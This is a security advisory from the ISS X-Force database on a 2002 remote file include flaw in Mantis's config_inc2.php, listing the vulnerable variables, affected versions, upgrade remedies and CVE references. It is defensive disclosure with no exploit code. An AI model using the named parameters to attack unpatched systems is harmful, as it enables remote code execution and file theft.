ISS X-Force Database: mantis-configinc-var-include(9900): Mantis config_inc2.php could allow an attacker to modify variable values to read or include remote files

Mantis config_inc2.php could allow an attacker to modify variable values to read or include remote files

mantis-configinc-var-include (9900)

Medium Risk

Description:

Mantis could allow a remote attacker to execute code or view files on the server, caused by a vulnerability in the default/config_inc2.php script. The default/config_inc2.php script fails to properly validate certain user-supplied variables. A remote attacker using either the $g_bottom_include_page, $g_top_include_page, $g_css_include_file or $g_meta_include_file variable in a request to the login_page.php script could specify a remote malicious PHP file to execute code or to view files on the server.

Consequences:

Gain Access

Remedy:

Upgrade to the latest version of Mantis (0.17.4a or later), available from the Mantis Web page. See References.

For Debian GNU/Linux 3.0 (woody):
Upgrade to the latest version of Mantis (0.17.1-2.1 or later), as listed in DSA-153-1. See References.

For other distributions:
Contact your vendor for upgrade or patch information.

References:

Mantis Advisory/2002-05: Arbitrary code execution and file reading.
Mantis Web site: Mantis.
BID-5509: Mantis Configuration Remote File Include Command Execution Vulnerability
CVE-2002-1114: config_inc2.php in Mantis before 0.17.4 allows remote attackers to execute arbitrary code or read arbitrary files via the parameters (1) g_bottom_include_page, (2) g_top_include_page, (3) g_css_include_file, (4) g_meta_include_file, or (5) a cookie.
DSA-153: mantis -- cross site code execution and privilege escalation

Platforms Affected:

Debian Debian Linux 3.0
Mantis Mantis 0.17.0 to 0.17.3

Reported:

Aug 19, 2002

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net

Return to the main page